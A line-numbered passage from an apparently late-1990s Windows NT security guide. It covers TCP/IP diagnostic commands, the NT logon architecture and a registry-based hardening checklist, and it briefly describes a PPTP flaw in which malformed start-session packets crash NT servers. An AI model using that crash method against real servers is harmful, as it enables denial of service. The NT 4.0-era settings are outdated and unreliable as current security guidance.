2231This setting control how many times PPTP will retransmit a packet.
2232
2233[4.0.7] Special Security Update
2234
2235SPECIAL REVISION: As a last minute revision to the lecture. A flaw has been discovered in the
2236PPTP architecture. It turns out that if you send a that if you send a pptp start session request with
2237an invalid packet length in the pptp packet header that it will crash an NT box and cause the NT
2238server to do a CoreDump. Fragments of code for a DoS attack package are flying, and the rhino9
2239team should have a completed DoS Attack program released soon. This program is released, of
2240course, for network administrators wanting to know how the bug works.
2241
2242[5.0.0] TCP/IP Commands as Tools
2243
2244 This is list of the most commonly used TCP/IP command line tools that are used to
2245explore and find out information from a network. These tools will be referred to later on in this
2246document, so its usage and function will not be explained later. Please note that not all of these
2247switches remain the same across different TCP/IP stacks. The Microsoft TCP/IP stack is almost
2248always different than most switches used on Unix systems.
2249
2250[5.0.1] The Arp Command
2251
2252The arp command will display internet to ethernet (IP to MAC) address translations which is
2253normally handled by the arp protocol. When the hostname is the only parameter, this command
2254will display the currect ARP entry for that hostname.
2255
2256Usage: arp hostname
2257
2258Switches: -a Displays current ARP entries by interrogating the current
2259 protocol data. If inet_addr is specified, the IP and Physical
2260 addresses for only the specified computer are displayed. If
2261 more than one network interface uses ARP, entries for each ARP
2262 table are displayed.
2263 -g Same as -a.
2264 inet_addr Specifies an internet address.
2265 -N if_addr Displays the ARP entries for the network interface specified
2266 by if_addr.
2267 -d Deletes the host specified by inet_addr.
2268 -s Adds the host and associates the Internet address inet_addr
2269 with the Physical address eth_addr. The Physical address is
2270 given as 6 hexadecimal bytes separated by hyphens. The entry
2271 is permanent.
2272 eth_addr Specifies a physical address.
2273 if_addr If present, this specifies the Internet address of the
2274 interface whose address translation table should be modified.
2275 If not present, the first applicable interface will be used.
2276
2277
2278[5.0.2] The Traceroute Command
2279
2280The traceroute command is used to trace the route that a packet takes to reach its destination.
2281This command works by using the time to live (TTL) filed in the IP packet.
2282
2283Usage: tracert IP or Hostname
2284
2285Switches: -d Do not resolve addresses to hostnames.
2286 -h maximum_hops Maximum number of hops to search for target.
2287 -j host-list Loose source route along host-list.
2288 -w timeout Wait timeout milliseconds for each reply.
2289
2290[5.0.3] The Netstat Command
2291
2292This command is used to query the network subsystem regarding certain types of information.
2293Different types of information will be received depending on the switches used in conjunction with
2294this command.
2295
2296Usage: netstat [switch]
2297
2298Switches: -A Shows the addresses of any associated protocol control blocks.
2299 -a Will show the status of all sockets. Sockets associated with network
2300 server processes are normally not shown.
2301 -i Shows the state of the network interfaces.
2302 -m Prints the network memory usage.
2303 -n Causes netstat to show actual addresses as opposed to hostnames or
2304 network names.
2305 -r Prints the routing table.
2306 -s Tells netstat to show the per protocol statistics.
2307 -t Replaces the queue length information with timer information.
2308
2309[5.0.4] The Finger Command
2310
2311By default, finger will list the login name, full name, terminal name, and write status (shown as a
2312"*" before the terminal name if write permission is denied), idle time, login time, office location,
2313and phone number (if known) for each current user connected to the network.
2314
2315Usage: finger username@domain
2316
2317Switches: -b Brief output format
2318 -f Supresses the printing of the header line.
2319 -i Provides a quick list of users with idle time.
2320 -l Forces long output format.
2321 -p Supresses printing of the .plan file (if present)
2322 -q Provides a quick list of users.
2323 -s Forces short output form.
2324 -w Forces narrow output form.
2325
2326[5.0.5] The Ping Command
2327
2328The ping (Packet Internet Groper) is used to send ICMP (Internet Control Message Protocol)
2329packets from one host to another. Ping transmits packets using the ICMP ECHO_REQUEST
2330command and expects an ICMP ECHO_REPLY.
2331
2332Usage: ping IP address or Hostname
2333
2334Switches: -t Ping the specifed host until interrupted.
2335 -a Resolve addresses to hostnames.
2336 -n count Number of echo requests to send.
2337 -l size Send buffer size.
2338 -f Set Don't Fragment flag in packet.
2339 -i TTL Time To Live.
2340 -v TOS Type Of Service.
2341 -r count Record route for count hops.
2342 -s count Timestamp for count hops.
2343 -j host-list Loose source route along host-list.
2344 -k host-list Strict source route along host-list.
2345 -w timeout Timeout in milliseconds to wait for each reply.
2346
2347[5.0.6] The Nbtstat Command
2348
2349Can be used to query the network concerning NetBIOS information. It can also be useful for
2350purging the NetBIOS cache and reloading the LMHOSTS file. This one command can be
2351extremely useful when performing security audits. When one knows how to interpret the
2352information, it can reveal more than one might think.
2353
2354Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
2355
2356Switches -a Lists the remote computer's name table given its host name.
2357 -A Lists the remote computer's name table given its IP address.
2358 -c Lists the remote name cache including the IP addresses.
2359 Lists the remote name cache including the IP addresses Lists local
2360NetBIOS
2361 names. Lists names resolved by broadcast and via WINS Purges and
2362reloads the
2363 remote cache name table Lists sessions table with the destination IP
2364addresses
2365 Lists sessions table converting destination IP addresses to host names via
2366the
2367 hosts file.
2368
2369 -n Lists local NetBIOS names.
2370 -r Lists names resolved by broadcast and via WINS.
2371 -R Purges and reloads the remote cache name table.
2372 -S Lists sessions table with the destination IP addresses.
2373 -s Lists sessions table converting destination IP addresses to host names via
2374the
2375 hosts file.
2376 interval This will redisplay the selected statistics, pausing for the number of
2377 seconds you
2378 choose as "interval" between each listing. Press CTRL+C to stop.
2379
2380Notes on NBTSTAT
2381
2382The column headings generated by NBTSTAT have the following meanings:
2383
2384Input
2385 Number of bytes received.
2386Output
2387 Number of bytes sent.
2388In/Out
2389 Whether the connection is from the computer (outbound) or from another system to
2390 the local computer (inbound).
2391Life
2392 The remaining time that a name table cache entry will "live" before your computer
2393 purges it.
2394Local Name
2395 The local NetBIOS name given to the connection.
2396Remote Host
2397 The name or IP address of the remote host.
2398Type
2399 A name can have one of two types: unique or group.
2400 The last byte of the 16 character NetBIOS name often means something because
2401 the same name can be present multiple times on the same computer. This shows
2402 the last byte of the name converted into hex.
2403State
2404 Your NetBIOS connections will be shown in one of the following "states":
2405
2406
2407 State Meaning
2408
2409 Accepting An incoming connection is in process.
2410 Associated The endpoint for a connection has been created and your computer has
2411ssociated it with an IP address.
2412 Connected This is a good state! It means you're connected to the remote resource.
2413 Connecting Your session is trying to resolve the name-to-IP address mapping of the
2414destination resource.
2415 Disconnected Your computer requested a disconnect, and it is waiting for the remote
2416computer to do so.
2417 Disconnecting Your connection is ending.
2418 Idle The remote computer has been opened in the current session, but is currently
2419not accepting connections.
2420 Inbound An inbound session is trying to connect.
2421 Listening The remote computer is available.
2422 Outbound Your session is creating the TCP connection.
2423 Reconnecting If your connection failed on the first attempt, it will display this state as it tries
2424to reconnect.
2425
2426Name Number Type Usage
2427=========================================================================
2428<computername> 00 U Workstation Service
2429<computername> 01 U Messenger Service
2430<\\_MSBROWSE_> 01 G Master Browser
2431<computername> 03 U Messenger Service
2432<computername> 06 U RAS Server Service
2433<computername> 1F U NetDDE Service
2434<computername> 20 U File Server Service
2435<computername> 21 U RAS Client Service
2436<computername> 22 U Exchange Interchange
2437<computername> 23 U Exchange Store
2438<computername> 24 U Exchange Directory
2439<computername> 30 U Modem Sharing Server Service
2440<computername> 31 U Modem Sharing Client Service
2441<computername> 43 U SMS Client Remote Control
2442<computername> 44 U SMS Admin Remote Control Tool
2443<computername> 45 U SMS Client Remote Chat
2444<computername> 46 U SMS Client Remote Transfer
2445<computername> 4C U DEC Pathworks TCPIP Service
2446<computername> 52 U DEC Pathworks TCPIP Service
2447<computername> 87 U Exchange MTA
2448<computername> 6A U Exchange IMC
2449<computername> BE U Network Monitor Agent
2450<computername> BF U Network Monitor Apps
2451<username> 03 U Messenger Service
2452<domain> 00 G Domain Name
2453<domain> 1B U Domain Master Browser
2454<domain> 1C G Domain Controllers
2455<domain> 1D U Master Browser
2456<domain> 1E G Browser Service Elections
2457<INet~Services> 1C G Internet Information Server
2458<IS~Computer_name> 00 U Internet Information Server
2459<computername> [2B] U Lotus Notes Server
2460IRISMULTICAST [2F] G Lotus Notes
2461IRISNAMESERVER [33] G Lotus Notes
2462Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
2463
2464Unique (U): The name may have only one IP address assigned to it. On a network device,
2465multiple occurences of a single name may appear to be registered, but the suffix will be unique,
2466making the entire name unique.
2467
2468Group (G): A normal group; the single name may exist with many IP addresses.
2469
2470Multihomed (M): The name is unique, but due to multiple network interfaces on the same
2471computer, this configuration is necessary to permit the registration. Maximum number of
2472addresses is 25.
2473
2474Internet Group (I): This is a special configuration of the group name used to manage WinNT
2475domain names.
2476
2477Domain Name (D): New in NT 4.0
2478
2479[5.0.7] The IpConfig Command
2480
2481The ipconfig command will give you information about your current TCP/IP configuration.
2482Information such as IP address, default gateway, subnet mask, etc can all be retrieved using this
2483command.
2484
2485Usage: ipconfig [/? | /all | /release [adapter] | /renew [adapter]]
2486
2487Switches: /? Display this help message.
2488 /all Display full configuration information.
2489 /release Release the IP address for the specified adapter.
2490 /renew Renew the IP address for the specified adapter.
2491
2492[5.0.8] The Telnet Command
2493
2494Technically, telnet is a protocol. This means it is a language that computer use to communicate
2495with one another in a particular way. From your point of view, Telnet is a program that lets you
2496login to a site on the Internet through your connection to Teleport. It is a terminal emulation
2497program, meaning that when you connect to the remote site, your computer functions as a
2498terminal for that computer.
2499
2500Once the connection is made, you can use your computer to access information, run programs,
2501edit files, and otherwise use whatever resources are available on the other computer. What is
2502available depends on the computer you connect to. Most of the times, if you type '?' or 'help', you
2503would normally receive some type of information, menu options, etc.
2504
2505 Note: telnet connections give you command-line access only. In other
2506 words, instead of being able to use buttons and menus as you do with a
2507 graphical interface, you have to type commands. However, telnet allows
2508 you to use certain utilities and resources you cannot access with your
2509 other Internet applications.
2510
2511Usage: telnet hostname or IP address port(optional)
2512
2513[6.0.0] NT Security
2514
2515[6.0.1] The Logon Process
2516
2517WinLogon
2518
2519Users must log on to a Windows NT machine in order to use that NT based machine or network.
2520The logon process itself cannot be bypassed, it is mandatory. Once the user has logged on, an
2521access token is created (this token will be discussed in more detail later). This token contains
2522user specific security information, such as: security identifier, group identifiers, user rights and
2523permissions. The user, as well as all processes spawned by the user are identified to the system
2524with this token.
2525
2526The first step in the WinLogon process is something we are all familiar with, CTRL+ALT+DEL.
2527This is NT's default Security Attention Sequence (SAS - The SAS key combo can be changed.
2528We will also discuss that later.). This SAS is a signal to the operating system that someone is
2529trying to logon. After the SAS is triggered, all user mode applications pause until the security
2530operation completes or is cancelled. (Note: The SAS is not just a logon operation, this same key
2531combination can be used for logging on, logging off, changing a password or locking the
2532workstation.) The pausing, or closing, of all user mode applications during SAS is a security
2533feature that most people take for granted and dont understand. Due to this pausing of
2534applications, logon related trojan viruses are stopped, keyloggers (programs that run in memory,
2535keeping track of keystrokes, therefor recording someones password) are stopped as well.
2536
2537The user name is not case sensitive but the password is.
2538
2539After typing in your information and clicking OK (or pressing enter), the WinLogon process
2540supplies the information to the security subsystem, which in turn compares the information to the
2541Security Accounts Manager (SAM). If the information is compliant with the information in the
2542SAM, an access token is created for the user. The WinLogon takes the access token and passes
2543it onto the Win32 subsytem, which in turn starts the operating systems shell. The shell, as well as
2544all other spawned processes will receive a token. This token is not only used for security, but also
2545allows NTs auditing and logging features to track user usage and access of network resources.
2546
2547Note: All of the logon components are located in a file known as the Graphical Indetification and
2548Authentication (GINA) module, specifically MSGINA.DLL. Under certain conditions, this file can
2549be replaced, which is how you would change the SAS key combination.
2550
2551For fine tuning of the WinLogon process, you can refer to the registry. All of the options for the
2552WinLogon process are contained in the
2553HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon area.
2554You can also fine tune the process by using the Policy Editor.
2555
2556Logging on to a Domain
2557
2558If an NT machine is a participant on a Domain, you would not only need to login to the local
2559machine, but the Domain as well. If a computer is a member of a Domain, the WinLogon process
2560is replaced by the NetLogon process.
2561
2562[6.0.2] Security Architecture Components
2563
2564Local Security Authority (LSA): Also known as the security subsystem, it is the central portion of
2565NT security. It handles local security policies and user authentication. The LSA also handles
2566generating and logging audit messages.
2567
2568Security Accounts Manager (SAM): The SAM handles user and group accounts, and provides
2569user authentication for the LSA.
2570
2571Security Reference Monitor (SRM): The SRM is in charge of enforcing and assuring access
2572validation and auditing for the LSA. It references user account information as the user attempts to
2573access resources.
2574
2575[6.0.3] Introduction to Securing an NT Box
2576
2577Abstract
2578Microsoft Windows NT operating system provides several security features. However, the default
2579out-of-the-box configuration is highly relaxed, especially on the Workstation product. This is
2580because the operating system is sold as a shrink-wrapped product with an assumption that an
2581average customer may not want to worry about a highly restrained but secure system on their
2582desktop.
2583
2584A particular installation's requirements can differ significantly from another. Therefore, it is
2585necessary for individual customers to evaluate their particular environment and requirements
2586before implementing a security configuration. This is also because implementing security settings
2587can impact system configuration. Certain applications installed on Windows NT may require
2588more relaxed settings to function properly than others because of the nature of the product.
2589Customers are therefore advised to careful evaluate recommendations in the context of their
2590system configurations and usage.
2591
2592If you install a Windows NT machine as a web server or a firewall, you should tighten up the
2593security on that box. Ordinary machines on your internal network are less accessible than a
2594machine the Internet. A machine accessible from the Internet is more vulnerable and likely to be
2595attacked. Securing the machine gives you a bastion host. Some of the things you should do
2596include:
2597
2598? Remove all protocol stacks except TCP/IP, since IP is the only protocol that runs on the
2599Internet
2600? Remove unnecessary network bindings
2601? Disable all unnecessary accounts, like guest
2602? Remove share permissions and default shares
2603? Remove network access for everyone (User Manger -> Policies ->User rights, "Access
2604this computer from the network")
2605? Disable unnecessary services
2606? Enable audit logging
2607? Track the audit information
2608
2609[6.0.4] Physical Security Considerations
2610Take the precautions you would with any piece of valuable equipment to protect against casual
2611theft. This step can include locking the room the computer is in when no one is there to keep an
2612eye on it, or using a locked cable to attach the unit to a wall. You might also want to establish
2613procedures for moving or repairing the computer so that the computer or its components cannot
2614be taken under false pretenses.
2615
2616Use a surge protector or power conditioner to protect the computer and its peripherals from
2617power spikes. Also, perform regular disk scans and defragmentation to isolate bad sectors and to
2618maintain the highest possible disk performance.
2619
2620As with minimal security, the computer should be protected as any valuable equipment would be.
2621Generally, this involves keeping the computer in a building that is locked to unauthorized users,
2622as most homes and offices are. In some instances you might want to use a cable and lock to
2623secure the computer to its location. If the computer has a physical lock, you can lock it and keep
2624the key in a safe place for additional security. However, if the key is lost or inaccessible, an
2625authorized user might be unable to work on the computer.
2626
2627You might choose to keep unauthorized users away from the power or reset switches on the
2628computer, particularly if your computer's rights policy denies them the right to shut down the
2629computer. The most secure computers (other than those in locked and guarded rooms) expose
2630only the computer's keyboard, monitor, mouse, and (when appropriate) printer to users. The CPU
2631and removable media drives can be locked away where only specifically authorized personnel
2632can access them.
2633
2634[6.0.5] Backups
2635Regular backups protect your data from hardware failures and honest mistakes, as well as from
2636viruses and other malicious mischief. The Windows NT Backup utility is described in Chapter 6,
2637"Backing Up and Restoring Network Files" in Microsoft Windows NT Server Concepts and
2638Planning. For procedural information, see Help.
2639
2640Obviously, files must be read to be backed up, and they must be written to be restored. Backup
2641privileges should be limited to administrators and backup operators—people to whom you are
2642comfortable giving read and write access on all files.
2643
2644[6.0.6] Networks and Security
2645If the network is entirely contained in a secure building, the risk of unauthorized taps is minimized
2646or eliminated. If the cabling must pass through unsecured areas, use optical fiber links rather than
2647twisted pair to foil attempts to tap the wire and collect transmitted data.
2648
2649[6.0.7] Restricting the Boot Process
2650Most personal computers today can start a number of different operating systems. For example,
2651even if you normally start Windows NT from the C: drive, someone could select another version
2652of Windows on another drive, including a floppy drive or CD-ROM drive. If this happens, security
2653precautions you have taken within your normal version of Windows NT might be circumvented.
2654
2655In general, you should install only those operating systems that you want to be used on the
2656computer you are setting up. For a highly secure system, this will probably mean installing one
2657version of Windows NT. However, you must still protect the CPU physically to ensure that no
2658other operating system is loaded. Depending on your circumstances, you might choose to
2659remove the floppy drive or drives. In some computers you can disable booting from the floppy
2660drive by setting switches or jumpers inside the CPU. If you use hardware settings to disable
2661booting from the floppy drive, you might want to lock the computer case (if possible) or lock the
2662machine in a cabinet with a hole in the front to provide access to the floppy drive. If the CPU is in
2663a locked area away from the keyboard and monitor, drives cannot be added or hardware settings
2664changed for the purpose of starting from another operating system. Another simple setting is to
2665edit the boot.ini file such that the boot timeout is 0 seconds; this will make hard for the user to
2666boot to another system if one exists.
2667
2668On many hardware platforms, the system can be protected using a power-on password. A power-
2669on password prevents unauthorized personnel from starting an operating system other than
2670Windows NT, which would compromise system security. Power-on passwords are a function of
2671the computer hardware, not the operating system software. Therefore the procedure for setting
2672up the power-on password depends on the type of computer and is available in the vendor's
2673documentation supplied with the system.
2674
2675[6.0.8] Security Steps for an NT Operating System
2676
2677[6.0.9] Install Latest Service Pack and applicable hot-fixes
2678 Completed Not implemented Not applicable
2679STATUS
2680
2681Install the latest recommended Microsoft Service Pack for the NT operating system. The
2682applicable hot-fixes should also be installed. Generally not all hot-fixes are required. Also the
2683order in which hot-fixes are installed is very important, as later hot-fixes sometimes supersede
2684earlier hot-fixes.
2685
2686ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40
2687
2688[6.1.0] Display a Legal Notice Before Log On
2689 Completed Not implemented Not applicable
2690STATUS
2691Windows NT can display a message box with the caption and text of your choice before a user
2692logs on. Many organizations use this message box to display a warning message that notifies
2693potential users that they can be held legally liable if they attempt to use the computer without
2694having been properly authorized to do so. The absence of such a notice could be construed as an
2695invitation, without restriction, to enter and browse the system.
2696
2697The log on notice can also be used in settings (such as an information kiosk) where users might
2698require instruction on how to supply a user name and password for the appropriate account.
2699To display a legal notice, use the Registry Editor to create or assign the following registry key
2700values on the workstation to be protected:
2701
2702Hive: HKEY_LOCAL_MACHINE\SOFTWARE
2703Key: \Microsoft\Windows NT\Current Version\Winlogon
2704Name: LegalNoticeCaption
2705Type: REG_SZ
2706Value: Whatever you want for the title of the message box
2707Hive: HKEY_LOCAL_MACHINE\SOFTWARE
2708Key: Microsoft\Windows NT\Current Version\Winlogon
2709Name: LegalNoticeText
2710Type: REG_SZ
2711Value: Whatever you want for the text of the message box
2712
2713The changes take effect the next time the computer is started. You might want to update the
2714Emergency Repair Disk to reflect these changes.
2715Example:
2716Welcome to the XYZ Information Kiosk
2717Log on using account name Guest and password XYZCorp.
2718Authorized Users Only
2719This system is for the use of authorized users only. Individuals using this computing system
2720without authority, or in excess of their authority, are subject to having all of their activities on this
2721system monitored and recorded by system personnel. In the course of monitoring individuals
2722improperly using this system, or in the course of system maintenance, the activities of authorized
2723users may be monitored. Anyone using this system expressly consents to such monitoring and is
2724advised that if such monitoring reveals possible evidence of criminal activity, system personnel
2725may provide the evidence of such monitoring to law enforcement officials.
2726
2727[6.1.1] Rename Administrative Accounts
2728 Completed Not implemented Not applicable
2729STATUS
2730
2731It is a good idea to rename the built-in Administrator account to something less obvious. This
2732powerful account is the one account that can never be locked out due to repeated failed log on
2733attempts, and consequently is attractive to hackers who try to break in by repeatedly guessing
2734passwords. By renaming the account, you force hackers to guess the account name as well as
2735the password.
2736
2737Make the following changes:
2738? Remove right "LOG ON FROM THE NETWORK" from Administrator's group
2739? Add right "LOG ON FROM THE NETWORK" for individuals who are administrators
2740? Enable auditing of failed login attempts
2741? Lock out users for more than 5 login failures
2742? Require password of at least 8 characters
2743
2744
2745[6.1.2] Disable Guest Account
2746 Completed Not implemented Not applicable
2747STATUS
2748
2749Disable Guest account and remove all rights (note: if using with Internet Information Server then
2750ensure that web user account has permission to access appropriate directories and the right to
2751"LOG ON LOCALLY"
2752
2753Limited access can be permitted for casual users through the built-in Guest account. If the
2754computer is for public use, the Guest account can be used for public log-ons. Prohibit Guest from
2755writing or deleting any files, directories, or registry keys (with the possible exception of a directory
2756where information can be left).
2757In a standard security configuration, a computer that allows Guest access can also be used by
2758other users for files that they don't want accessible to the general public. These users can log on
2759with their own user names and access files in directories on which they have set the appropriate
2760permissions. They will want to be especially careful to log off or lock the workstation before they
2761leave it.
2762
2763[6.1.3] Logging Off or Locking the Workstation
2764 Completed Not implemented Not applicable
2765STATUS
2766
2767Users should either log off or lock the workstation if they will be away from the computer for any
2768length of time. Logging off allows other users to log on (if they know the password to an account);
2769locking the workstation does not. The workstation can be set to lock automatically if it is not used
2770for a set period of time by using any 32-bit screen saver with the Password Protected option. For
2771information about setting up screen savers, see Help.
2772
2773? Install password protected screen saver that automatically starts if workstation is not
2774used for 5-15 minutes
2775
2776[6.1.4] Allowing Only Logged-On Users to Shut Down the Computer
2777 Completed Not implemented Not applicable
2778STATUS
2779
2780Normally, you can shut down a computer running Windows NT Workstation without logging on by
2781choosing Shutdown in the Logon dialog box. This is appropriate where users can access the
2782computer's operational switches; otherwise, they might tend to turn off the computer's power or
2783reset it without properly shutting down Windows NT Workstation. However, you can remove this
2784feature if the CPU is locked away. (This step is not required for Windows NT Server, because it is
2785configured this way by default.)
2786
2787To require users to log on before shutting down the computer, use the Registry Editor to create or
2788assign the following Registry key value:
2789
2790Hive: HKEY_LOCAL_MACHINE\SOFTWARE
2791Key: \Microsoft\Windows NT\Current Version\Winlogon
2792Name: ShutdownWithoutLogon
2793Type: REG_SZ
2794Value: 0
2795
2796The changes will take effect the next time the computer is started. You might want to update the
2797Emergency Repair Disk to reflect these changes.
2798
2799[6.1.5] Hiding the Last User Name
2800 Completed Not implemented Not applicable
2801STATUS
2802
2803By default, Windows NT places the user name of the last user to log on the computer in the User
2804name text box of the Logon dialog box. This makes it more convenient for the most frequent user
2805to log on. To help keep user names secret, you can prevent Windows NT from displaying the user
2806name from the last log on. This is especially important if a computer that is generally accessible is
2807being used for the (renamed) built-in Administrator account.
2808
2809
2810
2811To prevent display of a user name in the Logon dialog box, use the Registry Editor to create or
2812assign the following registry key value:
2813
2814Hive: HKEY_LOCAL_MACHINE\SOFTWARE
2815Key: \Microsoft\Windows NT\Current Version\Winlogon
2816Name: DontDisplayLastUserName
2817Type: REG_SZ
2818Value: 1
2819
2820[6.1.6] Restricting Anonymous network access to Registry
2821 Completed Not implemented Not applicable
2822STATUS
2823
2824Windows NT version 4.0 Service Pack 3 includes a security enhancement that restricts
2825anonymous (null session) logons when they connect to specific named pipes including the one for
2826Registry.
2827There is a registry key value that defines the list of named pipes that are "exempt" from this
2828restriction. The key value is:
2829
2830Hive: HKEY_LOCAL_MACHINE\SYSTEM
2831Key: System\CurrentControlSet\Services\LanManServer\Parameters
2832Name: NullSessionPipes
2833Type: REG_MULTI_SZ
2834Value: Add or Remove names from the list as required by the configuration.
2835
2836Please refer to Knowledge Base article Q143138 for more details.
2837
2838[6.1.7] Restricting Anonymous network access to lookup account names and network
2839shares
2840 Completed Not implemented Not applicable
2841STATUS
2842
2843Windows NT has a feature where anonymous logon users can list domain user names and
2844enumerate share names. Customers who want enhanced security have requested the ability to
2845optionally restrict this functionality. Windows NT 4.0 Service Pack 3 and a hotfix for Windows NT
28463.51 provide a mechanism for administrators to restrict the ability for anonymous logon users
2847(also known as NULL session connections) to list account names and enumerate share names.
2848Listing account names from Domain Controllers is required by the Windows NT ACL editor, for
2849example, to obtain the list of users and groups to select who a user wants to grant access rights.
2850Listing account names is also used by Windows NT Explorer to select from list of users and
2851groups to grant access to a share.
2852The registry key value to set for enabling this feature is:
2853
2854
2855Hive: HKEY_LOCAL_MACHINE\SYSTEM
2856Key: System\CurrentControlSet\Control\LSA
2857Name: RestrictAnonymous
2858Type: REG_DWORD
2859Value: 1.
2860
2861This enhancement is part of Windows NT version 4.0 Service Pack 3. A hot fix for it is also
2862provided for Windows NT version 3.51. Please refer to Knowledge Base article Q143474 for
2863more details on this.
2864
2865[6.1.8] Enforcing strong user passwords
2866 Completed Not implemented Not applicable
2867STATUS
2868
2869Windows NT 4.0 Service Pack 2 and later includes a password filter DLL file (Passfilt.dll) that lets
2870you enforce stronger password requirements for users. Passfilt.dll provides enhanced security
2871against "password guessing" or "dictionary attacks" by outside intruders.
2872
2873Passfilt.dll implements the following password policy:
2874? Passwords must be at least six (6) characters long. (The minimum password length can be
2875increased further by setting a higher value in the Password Policy for the domain).
2876? Passwords must contain characters from at least three (3) of the following four (4) classes:
2877Description Examples
2878English upper case letters A, B, C, ... Z
2879English lower case letters a, b, c, ... z
2880Westernized Arabic numerals 0, 1, 2, ... 9
2881Non-alphanumeric ("special characters") such as punctuation symbols
2882? Passwords may not contain your user name or any part of your full name.
2883
2884These requirements are hard-coded in the Passfilt.dll file and cannot be changed through the
2885user interface or registry. If you wish to raise or lower these requirements, you may write your
2886own .dll and implement it in the same fashion as the Microsoft version that is available with
2887Windows NT 4.0 Service Pack 2.
2888
2889To use Passfilt.Dll, the administrator must configure the password filter DLL in the system registry
2890on all domain controllers. This can be done as follows with the following registry key value:
2891
2892Hive: HKEY_LOCAL_MACHINE\SYSTEM
2893Key: System\CurrentControlSet\Control\LSA
2894Name: Notification Packages
2895Type: REG_MULTI_SZ
2896Value: Add string "PASSFILT" (do not remove existing ones).
2897
2898[6.1.9] Disabling LanManager Password Hash Support
2899 Completed Not implemented Not applicable
2900STATUS
2901
2902Windows NT supports the following two types of challenge/response authentication:
2903? LanManager (LM) challenge/response
2904? Windows NT challenge/response
2905
2906To allow access to servers that only support LM authentication, Windows NT clients currently
2907send both authentication types. Microsoft developed a patch that allows clients to be configured
2908to send only Windows NT authentication. This removes the use of LM challenge/response
2909messages from the network.
2910Applying this hot fix, configures the following registry key:
2911
2912Hive: HKEY_LOCAL_MACHINE\SYSTEM
2913Key: System\CurrentControlSet\Control\LSA
2914Name: LMCompatibilityLevel
2915Type: REG_DWORD
2916Value: 0,1,2 (Default 0)
2917
2918Setting the value to:
2919? 0 – Send both Windows NT and LM password forms.
2920? 1 – Send Windows NT and LM password forms only if the server requests it.
2921? 2 – Never send LM password form.
2922
2923If a Windows NT client selects level 2, it cannot connect to servers that support only LM
2924authentication, such as Windows 95 and Windows for Workgroups.
2925
2926For more complete information on this hot fix, please refer to Knowledge Base article number
2927Q147706.
2928
2929[6.2.0] Wiping the System Page File during clean system shutdown
2930 Completed Not implemented Not applicable
2931STATUS
2932
2933Virtual Memory support of Windows NT uses a system page file to swap pages from memory of
2934different processes onto disk when they are not being actively used. On a running system, this
2935page file is opened exclusively by the operating system and hence is well-protected. However,
2936systems that are configured to allow booting to other operating systems, may want to ensure that
2937system page file is wiped clean when Windows NT shuts down. This ensures that sensitive
2938information from process memory that may have made into the page file is not available to a
2939snooping user. This can be achieved by setting up the following key:
2940
2941Hive: HKEY_LOCAL_MACHINE\SYSTEM
2942Key: System\CurrentControlSet\Control\SessionManager\Memory Management
2943Name: ClearPageFileAtShutdown
2944Type: REG_DWORD
2945Value: 1
2946
2947Note that, this protection works only during a clean shutdown, therefore it is important that
2948untrusted users do not have ability to power off or reset the system manually.
2949
2950[6.2.1] Protecting the Registry
2951 Completed Not implemented Not applicable
2952STATUS
2953
2954All the initialization and configuration information used by Windows NT is stored in the registry.
2955Normally, the keys in the registry are changed indirectly, through the administrative tools such as
2956the Control Panel. This method is recommended. The registry can also be altered directly, with
2957the Registry Editor; some keys can be altered in no other way.
2958
2959The Registry Editor supports remote access to the Windows NT registry. To restrict network
2960access to the registry, use the Registry Editor to create the following registry key:
2961
2962Hive: HKEY_LOCAL_MACHINE
2963Key: \CurrentcontrolSet\Control\SecurePipeServers
2964Name: \winreg
2965
2966The security permissions set on this key define which users or groups can connect to the system
2967for remote registry access. The default Windows NT Workstation installation does not define this
2968key and does not restrict remote access to the registry. Windows NT Server permits only
2969administrators remote access to the registry.
2970
2971[6.2.2] Secure EventLog Viewing
2972 Completed Not implemented Not applicable
2973STATUS
2974
2975Default configuration allows guests and null log ons ability to view event logs (system, and
2976application logs). Security log is protected from guest access by default, it is viewable by users
2977who have "Manage Audit Logs" user right. The Event log services use the following key to
2978restrict guest access to these logs:
2979
2980Hive: HKEY_LOCAL_MACHINE
2981Key: \System\CurrentControlSet\Services\EventLog\[LogName]
2982Name: RestrictGuestAccess
2983Type REG_DWORD
2984Value: 1
2985
2986Set the value for each of the logs to 1. The change takes effect on next reboot. Needless to say
2987that you will have to change the security on this key to disallow everyone other than
2988Administrators and System any access because otherwise malicious users can reset these
2989values.
2990
2991[6.2.3] Secure Print Driver Installation
2992 Completed Not implemented Not applicable
2993STATUS
2994
2995Registry key AddPrinterDrivers under HKEY_LOCAL_MACHINE\System\CurrentControlSet\
2996Control\Print\Providers\LanMan Print Services\Servers, Key value AddPrinterDrivers
2997(REG_DWORD) is used to control who can add printer drivers using the print folder. This key
2998value should be set to 1 to enable the system spooler to restrict this operation to administrators
2999and print operators (on server) or power users (on workstation).
3000
3001Hive: HKEY_LOCAL_MACHINE
3002Key: System\CurrentcontrolSet\Control\Print\Providers\LanMan Print Services\Servers
3003Name: AddPrintDrivers
3004Type REG_DWORD
3005Value: 1
3006
3007[6.2.4] The Schedule Service (AT Command)
3008 Completed Not implemented Not applicable
3009STATUS
3010
3011The Schedule service (also known as the AT command) is used to schedule tasks to run
3012automatically at a preset time. Because the scheduled task is run in the context run by the
3013Schedule service (typically the operating system's context), this service should not be used in a
3014highly secure environment.
3015By default, only administrators can submit AT commands. To allow system operators to also
3016submit AT commands, use the Registry Editor to create or assign the following registry key value:
3017
3018Hive: HKEY_LOCAL_MACHINE\SYSTEM
3019Key: \CurrentControlSet\Control\Lsa
3020Name: Submit Control
3021Type: REG_DWORD
3022Value: 1
3023
3024There is no way to allow anyone else to submit AT commands. Protecting the registry as
3025explained earlier restricts direct modification of the registry key using the registry editor. Access
3026to the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\Schedule
3027should also be restricted to only those users/groups (preferrably Administrators only) that are
3028allowed to submit jobs to the schedule service.
3029The changes will take effect the next time the computer is started. You might want to update the
3030Emergency Repair Disk to reflect these changes.
3031
3032[6.2.5] Secure File Sharing
3033 Completed Not implemented Not applicable
3034STATUS
3035
3036The native Windows NT file sharing service is provided using the SMB-based server and
3037redirector services. Even though only administrators can create shares, the default security
3038placed on the share allows Everyone full control access. These permissions are controlling
3039access to files on down level file systems like FAT which do not have security mechanisms built
